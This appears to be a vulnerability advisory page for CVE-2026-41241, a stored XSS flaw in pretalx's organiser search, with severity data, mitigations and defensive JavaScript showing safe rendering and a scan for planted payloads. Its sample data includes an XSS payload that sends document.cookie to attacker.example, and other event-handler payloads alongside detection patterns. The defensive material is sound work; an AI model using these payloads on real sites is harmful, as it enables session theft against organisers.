Cyber Resilience

CVE-2026-41241

High

Published: 23 April 2026

Modified: 28 April 2026
KEV Added: not listed (not in the CISA KEV catalog as of this page's last update)
Patch: fixed in pretalx 2026.1.0
CVSS v3.1: 8.7 (High) CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
EPSS: 0.0017 (6.2nd percentile)
Risk Priority: 55 (floored blend · peak EPSS)

Summary

CVE-2026-41241 is a high-severity cross-site scripting (CWE-79) vulnerability in pretalx, an open-source conference planning tool. Its CVSS v3.1 base score is 8.7 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). Its EPSS score of 0.0017 places it at the 6.2nd percentile of exploit likelihood (well below the median), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2026-41241 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, in pretalx, an open-source conference planning tool. Published on 2026-04-23, the issue affects versions prior to 2026.1.0: the organiser search in the pretalx backend built its result dropdown by interpolating submission titles, speaker display names, and user names or emails directly into an HTML string and assigning it via innerHTML, so the browser parses those user-controlled values as markup rather than as text.

Any registered user can plant a payload simply by setting a field they control, such as their own display name; the payload fires when an organiser's search query matches that record and the result is rendered. The CVSS vector reflects this: exploitation is network-reachable (AV:N) with low complexity (AC:L), needs only a low-privileged account (PR:L) plus a single action by the victim, the search itself (UI:R), and yields high confidentiality and integrity impact (C:H/I:H) because the injected script runs with the organiser's session, in the organiser's browser rather than in the vulnerable backend, hence the scope change (S:C). Availability is not affected (A:N), giving a base score of 8.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N).
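The pattern the advisory describes, shown as an added example rather than pretalx's own code: a dropdown renderer that splices user-controlled strings into markup for innerHTML, beside two hardened versions (HTML-encoding at the point of interpolation, and building DOM nodes with textContent). The field names (type, title, subtitle), the sample search results and the attacker payload are all constructed for the demonstration.

```javascript
// Added example, not code from pretalx: the advisory's unsafe innerHTML
// interpolation pattern next to two hardened renderers. Field names
// (type/title/subtitle) and the sample results are constructed for the demo.

// 1. Vulnerable pattern: user-controlled strings are spliced into markup and
//    the caller assigns the result to dropdown.innerHTML. Anything that parses
//    as HTML in title or subtitle becomes live DOM in the organiser's browser.
function renderDropdownUnsafe(results) {
  return results
    .map((r) => `<li data-type="${r.type}">${r.title} <small>${r.subtitle}</small></li>`)
    .join("");
}

// 2. Fix A: HTML-encode every untrusted value at the point it enters markup.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}
function renderDropdownEscaped(results) {
  return results
    .map(
      (r) =>
        `<li data-type="${escapeHtml(r.type)}">${escapeHtml(r.title)} ` +
        `<small>${escapeHtml(r.subtitle)}</small></li>`,
    )
    .join("");
}

// 3. Fix B (preferred): build nodes and assign strings through textContent /
//    setAttribute so the HTML parser never sees attacker-controlled text.
//    `doc` is a parameter so the function can be exercised outside a browser.
function renderDropdownDom(doc, container, results) {
  container.textContent = ""; // clears any existing children
  for (const r of results) {
    const li = doc.createElement("li");
    li.setAttribute("data-type", r.type);
    const small = doc.createElement("small");
    small.textContent = r.subtitle;
    li.append(doc.createTextNode(`${r.title} `), small);
    container.append(li);
  }
  return container;
}

// Constructed sample: one honest submission and one registered user whose
// display name is an XSS payload. A <script> tag inserted through innerHTML is
// not executed by browsers, but an element with an event-handler attribute is,
// which is why real payloads for this bug class look like <img onerror=...>.
const SAMPLE_RESULTS = [
  { type: "submission", title: "Trust & Safety at scale", subtitle: "Alice Example" },
  {
    type: "user",
    title: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    subtitle: "mallory@example.org",
  },
];

// True when a rendered string still contains a live <img> element.
function containsLiveImgTag(html) {
  return /<img\b/i.test(html);
}

if (typeof require !== "undefined" && require.main === module) {
  const unsafeHtml = renderDropdownUnsafe(SAMPLE_RESULTS);
  const escapedHtml = renderDropdownEscaped(SAMPLE_RESULTS);
  console.log("unsafe  :", unsafeHtml);
  console.log("escaped :", escapedHtml);
  console.log("live tag survives unsafe render :", containsLiveImgTag(unsafeHtml));
  console.log("live tag survives escaped render:", containsLiveImgTag(escapedHtml));
}
```

Fix B is the one to prefer in a client-side renderer: it removes the need to get the encoding right on every interpolation site, and it keeps the `&` in a legitimate title such as "Trust & Safety" intact without any escaping decisions at all.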

The vulnerability is fixed in pretalx 2026.1.0; instances running any earlier version should upgrade. Additional details on the issue and the fix are in the GitHub security advisory at https://github.com/pretalx/pretalx/security/advisories/GHSA-cjcx-jfp2-f7m2.

Vulnerability details

pretalx is a conference planning tool. Prior to 2026.1.0, the organiser search in the pretalx backend rendered submission titles, speaker display names, and user names/emails into the result dropdown using innerHTML string interpolation. Any user who controls one of those fields (which includes any registered user whose display name is looked up by an administrator) could include HTML or JavaScript that would execute in an organiser's browser when the organiser's search query matched the malicious record. This vulnerability is fixed in 2026.1.0.

CWE(s)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Related Threats

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.007 Command and Scripting Interpreter: JavaScript (Execution)
Adversaries may abuse various implementations of JavaScript for execution.
Why these techniques?

Stored XSS in a web application is delivered by submitting crafted content to the public-facing application (T1190) and results in arbitrary JavaScript execution in the victim's browser (T1059.007). Note that this path requires a registered account (PR:L) and an action by the victim organiser (UI:R), so it is an authenticated, victim-assisted exploitation rather than an unauthenticated initial-access foothold.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2025-26907 (shared CWE-79)
CVE-2025-69084 (shared CWE-79)
CVE-2025-69048 (shared CWE-79)
CVE-2025-22567 (shared CWE-79)
CVE-2025-69324 (shared CWE-79)
CVE-2026-1841 (shared CWE-79)
CVE-2025-26588 (shared CWE-79)
CVE-2025-23850 (shared CWE-79)
CVE-2025-23643 (shared CWE-79)
CVE-2025-23616 (shared CWE-79)

Affected Assets

Vendor: pretalx
Product: pretalx
Affected versions: < 2026.1.0 (fixed in 2026.1.0)

Mitigating Controls (NIST 800-53 r5)

SI-15 Information Output Filtering (prevent)
Directly mitigates the XSS by requiring output filtering and encoding of user-controlled fields such as submission titles and display names before they are rendered into the search dropdown via innerHTML.

SI-10 Information Input Validation (prevent)
Validates user inputs such as display names, speaker names, and emails to reject or sanitize malicious HTML/JavaScript prior to storage and rendering. Output encoding remains the primary defence: legitimate titles can contain characters such as < and &, so input validation alone cannot be relied on to close this class of bug.

SI-2 Flaw Remediation (prevent)
Ensures timely identification, reporting, and patching of the flaw in pretalx versions prior to 2026.1.0 that enables unsafe innerHTML interpolation; in practice, upgrade to 2026.1.0 or later.
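Patching stops new exploitation, but a payload planted in a display name before the upgrade would have fired every time an organiser's search matched it, so the incident-response question is whether any such record already exists. The following is an added example, not pretalx's own tooling: a triage sweep over the fields the advisory names (submission titles, speaker display names, user names and emails) for values an HTML parser would treat as markup. The record shape, field names and sample rows are constructed; on a real instance you would feed it rows exported from the database or API.

```javascript
// Added example, not pretalx's code: a triage sweep over the fields the
// advisory names (submission titles, speaker display names, user names and
// emails) for markup that the vulnerable innerHTML path would have turned
// into live DOM. The record shape and sample rows are constructed; on a real
// instance you would feed it rows exported from the database or API.

const FIELDS_TO_CHECK = ["title", "display_name", "name", "email"];

// Patterns chosen to flag what an HTML parser would treat as markup while
// leaving ordinary text alone: "<" must be followed directly by a tag name,
// so "C++ <3 Rust" and "a < b > c" do not trip the tag check.
const TAG_RE = /<\/?[a-z][\w-]*[^>]*>/i;   // <img ...>, <svg/onload=...>, </b>
const HANDLER_RE = /\bon[a-z]+\s*=/i;      // onerror=, onload=, onmouseover=
const SCRIPT_URL_RE = /\bjavascript\s*:/i; // javascript: URLs in href/src

// Returns the list of reasons a single field value looks like markup
// (empty array for benign text).
function classify(value) {
  const s = String(value);
  const reasons = [];
  if (TAG_RE.test(s)) reasons.push("html-tag");
  if (HANDLER_RE.test(s)) reasons.push("event-handler");
  if (SCRIPT_URL_RE.test(s)) reasons.push("script-url");
  return reasons;
}

// Returns one finding per (record, field) whose value looks like markup.
function scanRecords(records) {
  const findings = [];
  for (const rec of records) {
    for (const field of FIELDS_TO_CHECK) {
      if (!(field in rec) || rec[field] == null) continue;
      const reasons = classify(rec[field]);
      if (reasons.length > 0) {
        findings.push({ id: rec.id, kind: rec.kind, field, reasons, value: String(rec[field]) });
      }
    }
  }
  return findings;
}

// Constructed sample rows: two benign submissions with awkward-but-harmless
// characters, and three user records carrying payloads of increasing subtlety
// (a full element, a tag with no whitespace, and a bare attribute break-out).
const SAMPLE_RECORDS = [
  { id: 101, kind: "submission", title: "C++ <3 Rust: a love story", display_name: "Alice Example" },
  { id: 102, kind: "submission", title: "Tom & Jerry at scale", display_name: "Bob Example" },
  { id: 7, kind: "user", name: "Mallory", email: "mallory@example.org",
    display_name: '<img src=x onerror="alert(document.domain)">' },
  { id: 8, kind: "user", name: "<svg/onload=alert(1)>", email: "eve@example.org", display_name: "Eve" },
  { id: 9, kind: "user", name: "Chuck", email: "chuck@example.org",
    display_name: 'Chuck" onmouseover="alert(1)' },
];

if (typeof require !== "undefined" && require.main === module) {
  for (const f of scanRecords(SAMPLE_RECORDS)) {
    console.log(`${f.kind} #${f.id} ${f.field}: ${f.reasons.join(",")} -> ${JSON.stringify(f.value)}`);
  }
}
```

Treat a hit as a lead, not a verdict: a title containing `<b>` may be an author's formatting habit, while an event-handler attribute in a display name has no honest explanation. Either way, the record's owner and the organiser accounts that searched for it in the exposure window are the next thing to look at.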

References

GHSA-cjcx-jfp2-f7m2: https://github.com/pretalx/pretalx/security/advisories/GHSA-cjcx-jfp2-f7m2